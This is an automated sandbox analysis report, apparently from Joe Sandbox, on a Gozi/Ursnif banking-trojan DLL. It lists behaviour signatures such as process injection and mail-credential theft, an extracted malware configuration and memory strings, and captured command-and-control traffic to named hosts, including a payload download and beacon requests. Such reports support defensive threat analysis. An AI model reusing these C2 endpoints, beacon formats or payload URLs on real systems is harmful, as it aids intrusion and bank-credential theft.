Analysis Report earmarkavchd

Overview

General Information

Sample Name:	earmarkavchd (renamed file extension from none to dll)
Analysis ID:	321067
MD5:	78b3444199a2932805d85cfdb30ad6fb
SHA1:	a1826a8bdd4aa6fc0bf2157a6063cca5534a3a46
SHA256:	66eaf5c2bc2ec2a01d74db9cc50744c748388cd9b0fa1f07181e639e128803ef
Most interesting Screenshot:

Detection

Gozi Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected Gozi e-Banking trojan

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: Dot net compiler compiles file from suspicious location

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a COM Internet Explorer object

Creates a thread in another existing process (thread injection)

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to steal Mail credentials (via file access)

Uses nslookup.exe to query domains

Writes or reads registry keys via WMI

Writes registry values via WMI

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Tries to load missing DLLs

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: earmarkavchd.dll

Avira: detected

Found malware configuration

Source: loaddll32.exe.4396.0.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "126", "system": "4ccebe99a7438fb71ee5005fa7d4ea12hh", "size": "200775", "crc": "2", "action": "00000000", "id": "2200", "time": "1605897653", "user": "1082ab698695dc15e71ab15c9ed3ab41", "hash": "0xc0ebb23d", "soft": "3"}

Multi AV Scanner detection for submitted file

Source: earmarkavchd.dll

ReversingLabs: Detection: 45%

Machine Learning detection for sample

Source: earmarkavchd.dll

Joe Sandbox ML: detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02828A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	0_2_02828A61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02826E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_02826E86
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_02813DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_02813DEE
Source: C:\Windows\explorer.exe	Code function: 29_2_03B791A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,	29_2_03B791A0
Source: C:\Windows\explorer.exe	Code function: 29_2_03B537B8 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,	29_2_03B537B8

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_02831C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,

0_2_02831C05

Networking:

Creates a COM Internet Explorer object

Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler	Jump to behavior

Found Tor onion address

Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp	String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses nslookup.exe to query domains

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Source: global traffic	HTTP traffic detected: GET /api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWTWpoyc/WU_2BHDqXNQHyF/aDmY5Jw7iTMS8Sm28wuKE/aE7o1rgRq9Zga98a/Lfk5mVpEscNl_2B/PEL_2BzPSrlVxe7hjg/VwIhIVlrD/Q75QLCo1R_2FGgXCAPcg/a82_2BpHTzLUJRE2skc/NrjfTQynui55314yUu2IJ7/NuVMlNbXu5eLz/t14q6jvB/NktWJXjAjAGBXHfWPm_0A_0/DDQhZDtGQu/HIp9aDbbcUD_2FJMS/dglTkO1jgRVp8/MzuzdPBBs/X HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_2Fdgzow/MjYIlNw6pXOFZtoH/ck22OsEBi4g5A21/99QRfbFqCod1fjkNsK/XxVSIrdVG/7FHa2ER9Ft02LqAkeU18/04NkD5rjB5JZqGFdQLM/maVmTCXIlwp0EX02aBt_2F/Clo4eegFdQ1lk/P1pW4ZJ5/wIbd6IdM2um9GQiRmu4HTYW/_2FpOuqNYz/HTi5jYJ7JeAd_0A_0/Dg9X8gZJHmh_/2B_2FHgF5eg/hemqUNvmE05Kam/e7yAaZ9rb60RXTZYuOS2q/HQUlA_2F4Fhmtp/3js HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVljDCJ/ih2L1Bdz8irJ/_2F8lSRByE0/SM6_2BP71LZESU/h3tJD1hVHbKiwkwE2IeWs/IizA7p6En4mCz2WA/NXpt5f6m6Jvf3pc/Mrs5oQ_2FPRoyih4jN/nKDhf733I/JOO4yWaqPLDk_2FATWs4/au98UO6brkA9iK_2BJ2/m2zSLNazAj56j867SYe4xl/cUNEATTbA9T6H/G_0A_0DY/h1e_2Bl0ZjLJIZf95sH7_2B/vbmm46cNio/kWkp8HAde3SsZyg36/ZN_2BmnjrWTcHtn/70R8a3b9 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/y593T41s/lL3TOAWpr8BAEirizPVY1nr/gHh_2FJm75/zCdiX47c4HpAxyRkT/qHLmarlSHot9/ONkJbY9gGOt/fQ6HQhMd_2B2I2/UNHWo1YbKowVIMWnTVz3S/Fy9pHKfmC1MflrBD/0HEKH0eANuLLaQi/NyVaE39P8WW680xE9C/zKHHHrqp_/2BtcUAWB7_2BpbaOT4FO/b_2BpTr1WFjW1cxH4os/NuSvnY4dMHLhOh3P7AJ4TT/NndN5S4150t5l/lDv81A2q/V_2FLzQ_2B_0A_0D_2B1i_2/FVUx_2B8Aw/gTJkpEcUGFJt7Exz1/ugevcO8oI6oRZ/xs5xjc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7/71DFI8PUSCc4m/XMwm02nY/k4iLrUAYDDvtv52BcxN4JBR/mhz_2Ft8VK/cNDRoyaxMsIxwxiz7/z7UQYEM6OBEY/IsC_2BO60JP/8DQpEZ9_2FIB1d/I_2FlPwkTE_2BidQ3R_2F/R3ia9KhwObxc1lnS/i7zxvyPIE4qo3ur/Ak3ONUjFI0trLtGmdw/2_2B5VotK/XxvvgQefWGm6F_0A_0Dg/2ryULZlOS2cT7CbqIGS/McMh6tWsIGNL2hue3Skqhq/rpuSb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 20 Nov 2020 09:40:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/ap
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNAAZYZ
Source: explorer.exe, 0000001D.00000000.388307908.000000000891C000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/6pQLMKxXX9R7A/0Kb9p8K4/BHJoVof6Fq7pyt4TOfPymNR/ZySC71MXSL/l8MLURonpjSVlj
Source: explorer.exe, 0000001D.00000000.389327777.0000000008C64000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/XO7QtVtOxvAU4dkxK/MUnrl2paNhM_/2FhuHDAlai0/NYk3fgMRD21K6x/275eVNVSoFX1z_
Source: explorer.exe, 0000001D.00000000.392738198.000000000DC5F000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/eo_2BIlYIakkFjtKlYh34Ss/HzB35UuLk7/cRenSoj_2Bmnd8Dj2/x181tJXN27RB/cqhJWT
Source: explorer.exe, 0000001D.00000002.518168118.00000000053C4000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/Tnjw5UXPt/L5vQXVeFjcg_2Bj0ZUjt/9bFRVhN6pC9d2H18KaD/RGYbWbOkYjL_2F2HT335i7
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000000.388809444.0000000008B54000.00000004.00000001.sdmp	String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: loaddll32.exe, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000013.00000003.369200959.0000022F9DAA8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
